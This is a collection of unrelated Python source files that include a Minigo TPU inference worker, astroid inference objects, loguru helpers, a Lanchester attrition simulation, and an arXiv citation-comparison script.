filename | text |
---|---|
the-stack_0_1520 | # Copyright 2018 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Worker process for running remote inference.
The worker wraps the inference model in an infinite loop: input features are
fetched via RPC at the top of the loop, and inference output is written back
at the bottom (again, via RPC).
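A minimal sketch of that flow, using the classes defined below (illustrative
only):

  worker = Worker()   # connects to the RPC server and builds a Session
  worker.run()        # worker threads loop: GetFeatures -> Session.run -> PutOutputs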
"""
import abc
from contextlib import contextmanager
import sys
import time
import threading
from absl import flags
import grpc
import numpy as np
from proto import inference_service_pb2
from proto import inference_service_pb2_grpc
import tensorflow as tf
from tensorflow.python.training import saver
import dual_net
import features as features_lib
import go
from utils import dbg
flags.DEFINE_string("model", "", "Path to the TensorFlow model.")
flags.DEFINE_string("checkpoint_dir", "",
"Path to a directory containing TensorFlow model "
"checkpoints. The inference worker will monitor this "
"when a new checkpoint is found, load the model and use it "
"for futher inferences.")
flags.DEFINE_string("server_address", "localhost:50051",
"Inference server local address.")
flags.DEFINE_string("descriptor",
"proto/inference_service_py_pb2.pb.descriptor_set",
"Path to the InferenceService proto descriptor.")
flags.DEFINE_integer("parallel_tpus", 8,
"Number of TPU cores to run on in parallel.")
FLAGS = flags.FLAGS
# The default maximum receive RPC size is only 4MB, which isn't large enough
# for our messages.
GRPC_OPTIONS = [
("grpc.max_message_length", 50 * 1024 * 1024),
("grpc.max_receive_message_length", 50 * 1024 * 1024),
]
NUM_WORKER_THREADS = 2
class RwMutex(object):
"""A simple read/write mutex.
I'm surprised Python doesn't provide one of these by default.
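Illustrative usage (mirrors how Session uses it below):

  mutex = RwMutex()
  with mutex.read_lock():
      ...  # multiple readers may hold the lock concurrently
  with mutex.write_lock():
      ...  # exclusive access for a single writer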
"""
def __init__(self):
self._resource_lock = threading.Semaphore()
self._read_lock = threading.Semaphore()
self._read_count = 0
@contextmanager
def write_lock(self):
self._acquire_write()
try:
yield
finally:
self._release_write()
@contextmanager
def read_lock(self):
self._acquire_read()
try:
yield
finally:
self._release_read()
def _acquire_write(self):
self._resource_lock.acquire()
def _release_write(self):
self._resource_lock.release()
def _acquire_read(self):
with self._read_lock:
self._read_count += 1
if self._read_count == 1:
self._resource_lock.acquire()
def _release_read(self):
with self._read_lock:
self._read_count -= 1
if self._read_count == 0:
self._resource_lock.release()
def const_model_inference_fn(features):
"""Builds the model graph with weights marked as constant.
This improves TPU inference performance because it prevents the weights
from being transferred to the TPU on every call to Session.run().
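For example (illustrative), a variable fetched as tf.get_variable("w", ...)
under the scope below is returned wrapped as
tf.guarantee_const(w, name="w/GuaranteeConst").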
Returns:
(policy_output, value_output, logits) tuple of tensors.
"""
def custom_getter(getter, name, *args, **kwargs):
with tf.control_dependencies(None):
return tf.guarantee_const(
getter(name, *args, **kwargs), name=name + "/GuaranteeConst")
with tf.variable_scope("", custom_getter=custom_getter):
return dual_net.model_inference_fn(features, False)
class Session(abc.ABC):
def __init__(self, sess):
self._sess = sess
# Event that gets set after a model is loaded.
# The worker threads wait for this event before starting inference.
self.model_available = threading.Event()
self._model_path = None
self._mutex = RwMutex()
def maybe_load_model(self, path):
"""Loads the given model if it's different from the current one."""
with self._mutex.read_lock():
if path == self._model_path:
return
with self._mutex.write_lock():
dbg(time.time(), "loading %s" % path)
self._locked_load_model(path)
self._model_path = path
dbg(time.time(), "loaded %s" % path)
self.model_available.set()
def run(self, raw_features):
"""Performs inference on the given raw features."""
features = self._prepare_features(raw_features)
with self._mutex.read_lock():
policy, value = self._locked_run(features)
local_model_path = self._model_path
return policy, value, local_model_path
def shutdown(self):
"""Shuts down the session."""
with self._mutex.write_lock():
self._locked_shutdown()
@abc.abstractmethod
def _locked_load_model(self, path):
"""Device-specific wrapper around a call to _load_graph.
Must be called with self._mutex held for write.
"""
pass
@abc.abstractmethod
def _locked_run(self, raw_features):
"""Device-specific evaluation of the model with the given raw features.
Must be called with self._mutex held for read.
"""
pass
@abc.abstractmethod
def _locked_shutdown(self):
"""Device-specific shutdown.
Must be called with self._mutex held for write.
"""
pass
@abc.abstractmethod
def _prepare_features(self, raw_features):
"""Device-specific preparation of raw features.
Does not require a lock to be held.
"""
pass
class BasicSession(Session):
def __init__(self):
Session.__init__(self, tf.Session(graph=tf.Graph()))
with self._sess.graph.as_default():
self._feature_placeholder = tf.placeholder(
tf.float32, [None, go.N, go.N,
features_lib.NEW_FEATURES_PLANES],
name='pos_tensor')
def _locked_shutdown(self):
pass
def _locked_load_model(self, path):
tf.reset_default_graph()
if path[-3:] == ".pb":
graph_def = tf.GraphDef()
with tf.gfile.FastGFile(path, 'rb') as f:
graph_def.ParseFromString(f.read())
with self._sess.graph.as_default():
self._outputs = tf.import_graph_def(
graph_def,
input_map={'pos_tensor': self._feature_placeholder},
return_elements=['policy_output:0', 'value_output:0'])
else:
with self._sess.graph.as_default():
self._outputs = dual_net.model_inference_fn(
self._feature_placeholder, training=False)
tf.train.Saver().restore(self._sess, path)
def _locked_run(self, features):
outputs = self._sess.run(self._outputs,
{self._feature_placeholder: features})
return outputs[0], outputs[1]
def _prepare_features(self, raw_features):
features = np.frombuffer(raw_features, dtype=np.int8)
features = features.reshape([-1, go.N, go.N,
features_lib.NEW_FEATURES_PLANES])
return features
class TpuSession(Session):
def __init__(self, tpu_name, parallel_tpus, batch_size):
tpu = [tpu_name] if tpu_name else None
tpu_grpc_url = tf.contrib.cluster_resolver.TPUClusterResolver(
tpu=tpu).get_master()
sess = tf.Session(tpu_grpc_url)
Session.__init__(self, sess)
self._parallel_tpus = parallel_tpus
self._batch_size = batch_size
# Create init & shutdown ops up front. This is probably not really
# necessary but it's what the sample code does.
self._tpu_init = tf.contrib.tpu.initialize_system()
self._tpu_shutdown = tf.contrib.tpu.shutdown_system()
self._feature_placeholders = []
with self._sess.graph.as_default():
for i in range(parallel_tpus):
features = tf.placeholder(
tf.float32, [None, go.N, go.N,
features_lib.NEW_FEATURES_PLANES],
name='pos_tensor')
self._feature_placeholders.append((features,))
self._outputs = tf.contrib.tpu.replicate(
const_model_inference_fn, self._feature_placeholders)
# tpu.replicate requires a list, but sess.run requires a tuple...
self._feature_placeholders = tuple(self._feature_placeholders)
def _locked_shutdown(self):
self._sess.run(self._tpu_shutdown)
def _locked_load_model(self, path):
if self._model_path:
dbg("shutting down tpu")
self._sess.run(self._tpu_shutdown)
with self._sess.graph.as_default():
tf.train.Saver().restore(self._sess, path)
dbg("initializing tpu")
self._sess.run(self._tpu_init)
def _locked_run(self, features):
outputs = self._sess.run(self._outputs,
{self._feature_placeholders: features})
policy = []
value = []
for x in outputs:
policy.extend(x[0])
value.extend(x[1])
return policy, value
def _prepare_features(self, raw_features):
num_board_features = go.N * go.N * features_lib.NEW_FEATURES_PLANES
num_features = self._batch_size * num_board_features
assert len(raw_features) == num_features * self._parallel_tpus
features = []
for i in range(self._parallel_tpus):
begin = i * num_features
x = np.frombuffer(
raw_features, dtype=np.int8, count=num_features, offset=begin)
x = x.reshape([self._batch_size, go.N, go.N,
features_lib.NEW_FEATURES_PLANES])
features.append(x)
return features
class Worker(object):
def __init__(self):
self.parallel_inferences = FLAGS.parallel_tpus if FLAGS.use_tpu else 1
self._get_server_config()
if FLAGS.use_tpu:
self.sess = TpuSession(
FLAGS.tpu_name, self.parallel_inferences, self.batch_size)
else:
self.sess = BasicSession()
if FLAGS.model:
self.sess.maybe_load_model(FLAGS.model)
def run(self):
self._running = True
try:
self._run_threads()
finally:
self._running = False
dbg("shutting down session")
self.sess.shutdown()
dbg("all done!")
def _get_server_config(self):
while True:
try:
channel = grpc.insecure_channel(FLAGS.server_address)
self.stub = inference_service_pb2_grpc.InferenceServiceStub(
channel)
config = self.stub.GetConfig(
inference_service_pb2.GetConfigRequest())
break
except grpc.RpcError:
dbg("Waiting for server")
time.sleep(1)
if config.board_size != go.N:
raise RuntimeError("Board size mismatch: server=%d, worker=%d" % (
config.board_size, go.N))
positions_per_inference = (config.games_per_inference *
config.virtual_losses)
if positions_per_inference % self.parallel_inferences != 0:
raise RuntimeError(
"games_per_inference * virtual_losses must be divisible by "
"parallel_tpus")
self.batch_size = positions_per_inference // self.parallel_inferences
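# Worked example (illustrative numbers): games_per_inference=8 and
# virtual_losses=8 give positions_per_inference=64; with 8 parallel
# inferences (TPU cores), batch_size is 64 // 8 = 8 positions per core.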
dbg("parallel_inferences = %d" % self.parallel_inferences)
dbg("games_per_inference = %d" % config.games_per_inference)
dbg("virtual_losses = %d" % config.virtual_losses)
dbg("positions_per_inference = %d" % positions_per_inference)
dbg("batch_size = %d" % self.batch_size)
def _run_threads(self):
"""Run inference threads and optionally a thread that updates the model.
Synchronization between the inference threads and the model update
thread is performed using a RwLock that protects access to self.sess.
The inference threads enter the critical section using a read lock, so
they can both run inference concurrently. The model update thread enters
the critical section using a write lock for exclusive access.
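Schematically (illustrative):
  inference threads:  with sess._mutex.read_lock():  sess._locked_run(features)
  checkpoint thread:  with sess._mutex.write_lock(): sess._locked_load_model(path)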
"""
threads = []
# Start the worker threads before the checkpoint thread: if the parent
# process dies, the worker thread RPCs will fail and the thread will
# exit. This gives us a chance below to set self._running to False,
# telling the checkpoint thread to exit.
for i in range(NUM_WORKER_THREADS):
threads.append(threading.Thread(
target=self._worker_thread, args=[i]))
if FLAGS.checkpoint_dir:
threads.append(threading.Thread(target=self._checkpoint_thread))
for t in threads:
t.start()
for i, t in enumerate(threads):
t.join()
dbg("joined thread %d" % i)
# Once the first thread has joined, tell the remaining ones to stop.
self._running = False
def _checkpoint_thread(self):
dbg("starting model loader thread")
while self._running:
freshest = saver.latest_checkpoint(FLAGS.checkpoint_dir)
if freshest:
self.sess.maybe_load_model(freshest)
# Wait a few seconds before checking again.
time.sleep(5)
def _worker_thread(self, thread_id):
dbg("waiting for model")
while self._running and not self.sess.model_available.wait(1):
pass
dbg("running worker", thread_id)
while self._running:
features_response = self.stub.GetFeatures(
inference_service_pb2.GetFeaturesRequest())
policy, value, model_path = self.sess.run(
features_response.features)
put_outputs_request = inference_service_pb2.PutOutputsRequest(
batch_id=features_response.batch_id,
policy=np.concatenate(policy), value=value,
model_path=model_path)
self.stub.PutOutputs(put_outputs_request)
dbg("stopping worker", thread_id)
def main():
tf.logging.set_verbosity(tf.logging.DEBUG)
worker = Worker()
worker.run()
if __name__ == "__main__":
flags.FLAGS(sys.argv, known_only=True)
main()
|
the-stack_0_1523 | from __future__ import annotations
import functools
import operator
from abc import abstractmethod
from typing import (
Callable,
Dict,
NamedTuple,
Protocol,
Tuple,
TypeVar,
Union,
overload,
runtime_checkable,
)
from torch import Tensor
from torch import device as Device
from torch import dtype as DType
from . import constants
T = TypeVar("T", covariant=True)
V = TypeVar("V", contravariant=True)
@runtime_checkable
class Runnable(Protocol[T]):
@abstractmethod
def run(self) -> T:
...
@runtime_checkable
class TensorMixin(Protocol):
@overload
@abstractmethod
def size(self) -> Tuple[int, ...]:
...
@overload
@abstractmethod
def size(self, dim: int) -> int:
...
@abstractmethod
def size(self, dim: int | None = None) -> int | Tuple[int, ...]:
...
def numel(self) -> int:
return functools.reduce(operator.mul, self.size(), 1)
def dim(self) -> int:
return len(self.size())
@abstractmethod
def dtype(self) -> DType:
...
@abstractmethod
def device(self) -> str | Device:
...
class BatchNoBatch(NamedTuple):
batch: int
no_batch: int
class BatchInfo(NamedTuple):
index: int
value: int
def map(self, func: Callable[[int], int]) -> BatchInfo:
index = func(self.index)
return BatchInfo(index, self.value)
@runtime_checkable
class RunnableTensor(Runnable[Tensor], TensorMixin, Protocol):
@abstractmethod
def batch(self) -> BatchInfo | None:
...
@abstractmethod
def take_batch(self, low: int, high: int) -> Tensor:
...
@abstractmethod
def visit(self, nodes: Dict[int, TensorLike]) -> None:
...
def buffer(self) -> Dict[int, TensorLike]:
nodes = {}
self.visit(nodes)
return nodes
def buffer_numel(self) -> BatchNoBatch:
buffer = self.buffer().values()
return BatchNoBatch(
sum(t.numel() for t in buffer if bat(t) is not None),
sum(t.numel() for t in buffer if bat(t) is None),
)
def buffer_memory(self) -> BatchNoBatch:
buffer = self.buffer().values()
return BatchNoBatch(
sum(mem(t) for t in buffer if bat(t) is not None),
sum(mem(t) for t in buffer if bat(t) is None),
)
def memory(self) -> int:
return mem(self)
def dtyp(tensor: TensorLike) -> DType:
if isinstance(tensor, Tensor):
return tensor.dtype
return tensor.dtype()
def dev(tensor: TensorLike) -> str | Device:
if isinstance(tensor, Tensor):
return tensor.device
return tensor.device()
def mem(tensor: TensorLike) -> int:
dt = dtyp(tensor)
numel = tensor.numel()
return constants.MEMORY_BYTES[dt] * numel
def bat(tensor: TensorLike) -> BatchInfo | None:
if isinstance(tensor, RunnableTensor):
return tensor.batch()
return None
TensorLike = Union[Tensor, RunnableTensor]
|
the-stack_0_1524 | import argparse
def parse_args():
parser = argparse.ArgumentParser(
description="Get parameters for the ABM Simulation"
)
# Name and seed
parser.add_argument("--name", help="experiment name", required=True)
parser.add_argument("--seed", help="seed for reproducibility", type=int, default=42)
return parser.parse_args()
if __name__ == "__main__":
config = parse_args()
|
the-stack_0_1527 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Fri Aug 18 2017
@author: Alvaro Radigales
A simple Python implementation of the Lanchester Linear Law. Force
strength for each time pulse of the simulation is stored in a NumPy
array, and later plotted using MatPlotLib.
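As implemented below, with a fixed frontage F the strengths follow
  dB/dt = -F * redLethality
  dR/dt = -F * blueLethality
integrated with a forward-Euler step of size timeStep (this sketch describes
the code below, not Lanchester theory in general).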
"""
import numpy
import matplotlib.pyplot as plot
from math import ceil
# The length of the time step will not alter the end result.
# Use only to determine the resolution of the graph.
timeStart = 0.0
timeEnd = 10.0
timeStep = 0.01
steps = int((timeEnd - timeStart) / timeStep)
# Initialise numpy arrays covering each step of the simulation.
blue = numpy.zeros(steps)
red = numpy.zeros(steps)
time = numpy.zeros(steps)
# To remove the frontage constraint, change the frontage variable to
# the smaller remaining force, both in its declaration and in the loop.
blue[0] = 42
red[0] = 30
frontage = 5
blueLethality = 1
redLethality = 1
time[0] = timeStart
for i in range(steps - 1):
frontage = min(frontage, ceil(red[i]), ceil(blue[i]))
blue[i+1] = max(0, blue[i] - timeStep * (frontage * redLethality))
red[i+1] = max(0, red[i] - timeStep * (frontage * blueLethality))
time[i+1] = time[i] + timeStep
# Remaining forces at the end of the simulation, for plot label purposes.
blueRemaining = int(blue[len(blue)-1])
redRemaining = int(red[len(red)-1])
# Plot code.
plot.figure()
plot.step(time, blue, '-b', where = 'post', label = 'Blue army')
plot.step(time, red, '-r', where = 'post', label = 'Red army')
plot.ylabel('Strength')
plot.xlabel('Time')
plot.legend()
plot.annotate(blueRemaining,
xy=(timeEnd, blue[len(blue)-1]),
xytext=(-15,10),
textcoords='offset points')
plot.annotate(redRemaining,
xy=(timeEnd, red[len(red)-1]),
xytext=(-15,10),
textcoords='offset points')
plot.show()
|
the-stack_0_1528 | """Loguru utils"""
# List of files in `fairseq_cli` that use logging. Any file not in this list
# that attempts to use logging will get a logger named after its own file name
# (i.e., `__name__`).
name_list = ["eval_lm", "generate", "hydra_train", "interactive", "preprocess",
"train", "validate"]
def loguru_name_patcher(record):
filename = record["file"].name # filename, e.g., `train.py`
name = ".".join(filename.split(".")[:-1]) # remove the ".py" part
if name in name_list:
name = f"fairseq_cli.{name}" # legacy name, e.g., `fairseq_cli.train`
record["extra"].update(name=name)
def loguru_reset_logger(logger):
"""Remove all handlers"""
handlers = logger._core.handlers
for _ in range(len(handlers)):
logger.remove()
class LoguruLevels:
TRACE = 5
DEBUG = 10
INFO = 20
SUCCESS = 25
WARNING = 30
ERROR = 40
CRITICAL = 50
def loguru_set_level(logger, level):
"""Set level of all handlers of the provided logger. Note that this
implementation is very non-standard; avoid using it if at all possible."""
for handler in logger._core.handlers.values():
handler._levelno = level
def get_effective_level(logger):
"""Get effective level of the logger by finding the smallest level among
all handlers."""
levels = []
for handler in logger._core.handlers.values():
levels.append(handler.levelno)
return min(levels)
def loguru_emit_some_handlers(logger, handler_ids, message, name,
level_id="INFO"):
"""Emit message using specific handlers while ignoring others. Currently
only supports non-colorized messages.
Parameters
----------
logger : loguru._logger.Logger
Loguru logger.
handler_ids : list of int
List of handler IDs to deal with.
message : str
Message to emit.
name : str
Logger name.
level_id : str
Level name.
"""
from loguru._recattrs import RecordLevel
from loguru._datetime import aware_now
core = logger._core
level_name, level_no, _, level_icon = core.levels[level_id]
for handler_id in handler_ids:
handler = core.handlers[handler_id]
log_record = {
"message": message,
"level": RecordLevel(level_name, level_no, level_icon),
"exception": None,
"time": aware_now(),
"extra": {"name": name},
}
handler.emit(log_record, level_id, from_decorator=False, is_raw=False,
colored_message=None)
|
the-stack_0_1529 | import pytest
import fsspec
pytest.importorskip("distributed")
@pytest.fixture()
def cli(tmpdir):
import dask.distributed
client = dask.distributed.Client(n_workers=1)
def setup():
m = fsspec.filesystem("memory")
with m.open('afile', 'wb') as f:
f.write(b'data')
client.run(setup)
try:
yield client
finally:
client.close()
def test_basic(cli):
fs = fsspec.filesystem('dask', remote_protocol='memory')
assert fs.ls('') == ['afile']
assert fs.cat('afile') == b'data'
|
the-stack_0_1530 | # Copyright (c) 2015-2016, 2018-2020 Claudiu Popa <[email protected]>
# Copyright (c) 2015-2016 Ceridwen <[email protected]>
# Copyright (c) 2015 Florian Bruhin <[email protected]>
# Copyright (c) 2016 Derek Gustafson <[email protected]>
# Copyright (c) 2018 hippo91 <[email protected]>
# Copyright (c) 2018 Bryce Guinta <[email protected]>
# Copyright (c) 2021 Pierre Sassoulas <[email protected]>
# Copyright (c) 2021 Marc Mueller <[email protected]>
# Licensed under the LGPL: https://www.gnu.org/licenses/old-licenses/lgpl-2.1.en.html
# For details: https://github.com/PyCQA/astroid/blob/main/LICENSE
"""
Inference objects are a way to represent composite AST nodes,
which are used only as inference results, so they can't be found in the
original AST tree. For instance, inferring the following frozenset use,
leads to an inferred FrozenSet:
Call(func=Name('frozenset'), args=Tuple(...))
"""
from astroid import bases, decorators, node_classes, scoped_nodes, util
from astroid.const import BUILTINS
from astroid.exceptions import (
AttributeInferenceError,
InferenceError,
MroError,
SuperError,
)
from astroid.manager import AstroidManager
objectmodel = util.lazy_import("interpreter.objectmodel")
class FrozenSet(node_classes._BaseContainer):
"""class representing a FrozenSet composite node"""
def pytype(self):
return "%s.frozenset" % BUILTINS
def _infer(self, context=None):
yield self
@decorators.cachedproperty
def _proxied(self): # pylint: disable=method-hidden
ast_builtins = AstroidManager().builtins_module
return ast_builtins.getattr("frozenset")[0]
class Super(node_classes.NodeNG):
"""Proxy class over a super call.
This class offers almost the same behaviour as Python's super,
which is MRO lookups for retrieving attributes from the parents.
The *mro_pointer* is the place in the MRO from where we should
start looking, not counting it. *mro_type* is the object which
provides the MRO, it can be both a type or an instance.
*self_class* is the class where the super call is, while
*scope* is the function where the super call is.
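For example (illustrative), for ``super(B, self)`` written inside ``B.meth``:
*mro_pointer* is the ClassDef for ``B``, *mro_type* is the instance bound to
``self``, *self_class* is ``B`` and *scope* is ``B.meth``.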
"""
# pylint: disable=unnecessary-lambda
special_attributes = util.lazy_descriptor(lambda: objectmodel.SuperModel())
def __init__(self, mro_pointer, mro_type, self_class, scope):
self.type = mro_type
self.mro_pointer = mro_pointer
self._class_based = False
self._self_class = self_class
self._scope = scope
super().__init__()
def _infer(self, context=None):
yield self
def super_mro(self):
"""Get the MRO which will be used to lookup attributes in this super."""
if not isinstance(self.mro_pointer, scoped_nodes.ClassDef):
raise SuperError(
"The first argument to super must be a subtype of "
"type, not {mro_pointer}.",
super_=self,
)
if isinstance(self.type, scoped_nodes.ClassDef):
# `super(type, type)`, most likely in a class method.
self._class_based = True
mro_type = self.type
else:
mro_type = getattr(self.type, "_proxied", None)
if not isinstance(mro_type, (bases.Instance, scoped_nodes.ClassDef)):
raise SuperError(
"The second argument to super must be an "
"instance or subtype of type, not {type}.",
super_=self,
)
if not mro_type.newstyle:
raise SuperError("Unable to call super on old-style classes.", super_=self)
mro = mro_type.mro()
if self.mro_pointer not in mro:
raise SuperError(
"The second argument to super must be an "
"instance or subtype of type, not {type}.",
super_=self,
)
index = mro.index(self.mro_pointer)
return mro[index + 1 :]
@decorators.cachedproperty
def _proxied(self):
ast_builtins = AstroidManager().builtins_module
return ast_builtins.getattr("super")[0]
def pytype(self):
return "%s.super" % BUILTINS
def display_type(self):
return "Super of"
@property
def name(self):
"""Get the name of the MRO pointer."""
return self.mro_pointer.name
def qname(self):
return "super"
def igetattr(self, name, context=None):
"""Retrieve the inferred values of the given attribute name."""
if name in self.special_attributes:
yield self.special_attributes.lookup(name)
return
try:
mro = self.super_mro()
# Don't let invalid MROs or invalid super calls
# leak out as is from this function.
except SuperError as exc:
raise AttributeInferenceError(
(
"Lookup for {name} on {target!r} because super call {super!r} "
"is invalid."
),
target=self,
attribute=name,
context=context,
super_=exc.super_,
) from exc
except MroError as exc:
raise AttributeInferenceError(
(
"Lookup for {name} on {target!r} failed because {cls!r} has an "
"invalid MRO."
),
target=self,
attribute=name,
context=context,
mros=exc.mros,
cls=exc.cls,
) from exc
found = False
for cls in mro:
if name not in cls.locals:
continue
found = True
for inferred in bases._infer_stmts([cls[name]], context, frame=self):
if not isinstance(inferred, scoped_nodes.FunctionDef):
yield inferred
continue
# We can obtain different descriptors from a super depending
# on what we are accessing and where the super call is.
if inferred.type == "classmethod":
yield bases.BoundMethod(inferred, cls)
elif self._scope.type == "classmethod" and inferred.type == "method":
yield inferred
elif self._class_based or inferred.type == "staticmethod":
yield inferred
elif isinstance(inferred, Property):
function = inferred.function
try:
yield from function.infer_call_result(
caller=self, context=context
)
except InferenceError:
yield util.Uninferable
elif bases._is_property(inferred):
# TODO: support other descriptors as well.
try:
yield from inferred.infer_call_result(self, context)
except InferenceError:
yield util.Uninferable
else:
yield bases.BoundMethod(inferred, cls)
if not found:
raise AttributeInferenceError(target=self, attribute=name, context=context)
def getattr(self, name, context=None):
return list(self.igetattr(name, context=context))
class ExceptionInstance(bases.Instance):
"""Class for instances of exceptions
It has special treatment for some of the exceptions's attributes,
which are transformed at runtime into certain concrete objects, such as
the case of .args.
"""
@decorators.cachedproperty
def special_attributes(self):
qname = self.qname()
instance = objectmodel.BUILTIN_EXCEPTIONS.get(
qname, objectmodel.ExceptionInstanceModel
)
return instance()(self)
class DictInstance(bases.Instance):
"""Special kind of instances for dictionaries
This instance knows the underlying object model of the dictionaries, which means
that methods such as .values or .items can be properly inferred.
"""
# pylint: disable=unnecessary-lambda
special_attributes = util.lazy_descriptor(lambda: objectmodel.DictModel())
# Custom objects tailored for dictionaries, which are used to
# disambiguate between the types of Python 2 dict's method returns
# and Python 3 (where they return set like objects).
class DictItems(bases.Proxy):
__str__ = node_classes.NodeNG.__str__
__repr__ = node_classes.NodeNG.__repr__
class DictKeys(bases.Proxy):
__str__ = node_classes.NodeNG.__str__
__repr__ = node_classes.NodeNG.__repr__
class DictValues(bases.Proxy):
__str__ = node_classes.NodeNG.__str__
__repr__ = node_classes.NodeNG.__repr__
class PartialFunction(scoped_nodes.FunctionDef):
"""A class representing partial function obtained via functools.partial"""
def __init__(
self, call, name=None, doc=None, lineno=None, col_offset=None, parent=None
):
super().__init__(name, doc, lineno, col_offset, parent)
self.filled_positionals = len(call.positional_arguments[1:])
self.filled_args = call.positional_arguments[1:]
self.filled_keywords = call.keyword_arguments
def infer_call_result(self, caller=None, context=None):
if context:
current_passed_keywords = {
keyword for (keyword, _) in context.callcontext.keywords
}
for keyword, value in self.filled_keywords.items():
if keyword not in current_passed_keywords:
context.callcontext.keywords.append((keyword, value))
call_context_args = context.callcontext.args or []
context.callcontext.args = self.filled_args + call_context_args
return super().infer_call_result(caller=caller, context=context)
def qname(self):
return self.__class__.__name__
# TODO: Hack to solve the circular import problem between node_classes and objects
# This is not needed in 2.0, which has a cleaner design overall
node_classes.Dict.__bases__ = (node_classes.NodeNG, DictInstance)
class Property(scoped_nodes.FunctionDef):
"""Class representing a Python property"""
def __init__(
self, function, name=None, doc=None, lineno=None, col_offset=None, parent=None
):
self.function = function
super().__init__(name, doc, lineno, col_offset, parent)
# pylint: disable=unnecessary-lambda
special_attributes = util.lazy_descriptor(lambda: objectmodel.PropertyModel())
type = "property"
def pytype(self):
return "%s.property" % BUILTINS
def infer_call_result(self, caller=None, context=None):
raise InferenceError("Properties are not callable")
def infer(self, context=None, **kwargs):
return iter((self,))
|
the-stack_0_1534 | import pytest
from mock import Mock, patch
from service import get_maps
@patch('service.map_service_common.get_all_maps')
def test_get_maps(get_all_maps_mock):
get_all_maps_mock.return_value = {}
response = get_maps.lambda_handler({}, None)
valid_response = {'statusCode': 200, 'body': '{"Maps": {}}', 'headers': {'Access-Control-Allow-Origin': '*'}}
get_all_maps_mock.assert_called()
assert response == valid_response
@patch('service.map_service_common.get_all_maps')
def test_get_maps_dynamo_failure(get_all_maps_mock):
with pytest.raises(IOError):
get_all_maps_mock.side_effect = Mock(side_effect=IOError('Dynamo Exception'))
get_maps.lambda_handler({}, None)
|
the-stack_0_1535 | import os
import json
import random
META = "../../important_data/"
N = 10000
def load_metadata(filename):
print("Start reading " + filename)
with open(os.path.join(META, filename)) as f:
data = json.load(f)
return data
def remove_version_ending(arxiv_id):
return arxiv_id.rsplit("v", 1)[0]
def format_name_to_id(name):
return ''.join(name.split()).lower()
def path_to_id(name):
""" Convert filepath name of ArXiv file to ArXiv ID """
if '.' in name: # new ID
return name
split = name.split("_")
return "/".join(split)
valid_aids = set(list(map(remove_version_ending, load_metadata("sampled_aids_100k.json"))))
arxiv_metadata = load_metadata("arxiv_id_to_doi_title.json")
# Get ground truth
print("Get Ground truth")
# Filter mag data to only include ID from the sampled 100k and which have an DOI
mag_gt_overall = {key: value for key, value in load_metadata("aid_to_ref_magids.json").items()
if ((key in valid_aids) and (arxiv_metadata[key][0]))}
# Add empty references
for key in load_metadata("aids_without_ref.json"):
if (key in valid_aids) and (arxiv_metadata[key][0]):
mag_gt_overall[key] = []
# Sample 10k
random.seed("Random Seed for similar results upon rerunning the code")
gt_keys = set(random.sample(list(mag_gt_overall.keys()), N))
# Build sampled_gt
mag_data = load_metadata("magid_to_data.json")
# Get (title,arxiv_id) for all references entries by MAG data
gt_aid_to_data = {key: [(mag_data[ref_mag_id][2], mag_data[ref_mag_id][3]) for ref_mag_id in mag_gt_overall[key]]
for key in gt_keys}
gt_len = len(gt_aid_to_data)
gt_overall_references = sum([len(value) for key, value in gt_aid_to_data.items()])
# Get Bierbaum Work
print("Get Bierbaum data")
bierbaum_overall = load_metadata("merged_internal-citations.json")
bierbaum_compare_with_version = {key: value for key, value in bierbaum_overall.items() if
remove_version_ending(key) in gt_keys}
bierbaum_compare = {}
for key, value in bierbaum_compare_with_version.items():
aid_without_version = remove_version_ending(key)
arxiv_citations_without_version = [remove_version_ending(tmp_aid) for tmp_aid in value]
bierbaum_compare[aid_without_version] = arxiv_citations_without_version
# Compare Bierbaum Work
print("Compare Bierbaum data")
bb_len = len(bierbaum_compare)
bb_overall_references = sum([len(value) for key, value in bierbaum_compare.items()])
bb_hit = 0
bb_miss = 0
bb_self = 0
# Compare based only on arXiv IDs, as Bierbaum's work only has arXiv IDs
arxiv_metadata_keys = set(arxiv_metadata.keys())
for arxiv_id, references in bierbaum_compare.items():
# Get values of Ground truth
gt_references = gt_aid_to_data[arxiv_id]
gt_arxiv_ids = set([data[1] for data in gt_references if data[1]])
gt_titles = set([format_name_to_id(data[0]) for data in gt_references])
# Check compliance
for ref_aid in references:
# Skip in case of self reference
if ref_aid == arxiv_id:
bb_self += 1
continue
if ref_aid in gt_arxiv_ids:
bb_hit += 1
continue
if (ref_aid in arxiv_metadata_keys) and (format_name_to_id(arxiv_metadata[ref_aid][1]) in gt_titles):
bb_hit += 1
continue
# Unable to match the reference found by bierbaum to a reference in the ground truth
bb_miss += 1
# Compare parser results
print("Get Parser data")
parsed_100k = load_metadata("parsed_sampled_100k.json")
parsed_sampled_without_version = {}
for key, p_references in parsed_100k.items():
# Remove version
aid_no_version = remove_version_ending(key)
# Make _ to / as its coming from file names
aid_fixed = path_to_id(aid_no_version)
if aid_fixed in gt_keys:
parsed_sampled_without_version[aid_fixed] = [format_name_to_id(ref["title"]) for ref in p_references]
print("Compare Parser data")
p_len = len(parsed_sampled_without_version)
p_overall_references = sum([len(value) for key, value in parsed_sampled_without_version.items()])
p_hit = 0
p_miss = 0
p_self = 0
# Compare based on paper titles, as the parser output only provides titles
for arxiv_id, references in parsed_sampled_without_version.items():
# Get values of Ground truth
gt_references = gt_aid_to_data[arxiv_id]
gt_titles = set([format_name_to_id(data[0]) for data in gt_references])
# Check compliance
for ref_title in references:
# Skip in case of self reference
if (arxiv_id in arxiv_metadata_keys) and (ref_title == format_name_to_id(arxiv_metadata[arxiv_id][1])):
p_self += 1
continue
if ref_title in gt_titles:
p_hit += 1
continue
# Unable to match the reference found by the parser to a reference in the ground truth
p_miss += 1
print("\n[Ground Truth (GT) MAG] Entries: {}; Overall references {}".format(gt_len, gt_overall_references))
print(("[Bierbaum] Entries: {} (%-of-GT: {:.2%}); Overall references {} (%-of-GT: {:.2%}); " +
"Found {} of GT references ({:.2%}). Found {} references not in GT (%-of-Bierbaum-Refs: {:.2%}). Self-references: {}").format(
bb_len, bb_len / gt_len, bb_overall_references, bb_overall_references / gt_overall_references,
bb_hit, bb_hit / gt_overall_references, bb_miss, bb_miss / bb_overall_references, bb_self)
)
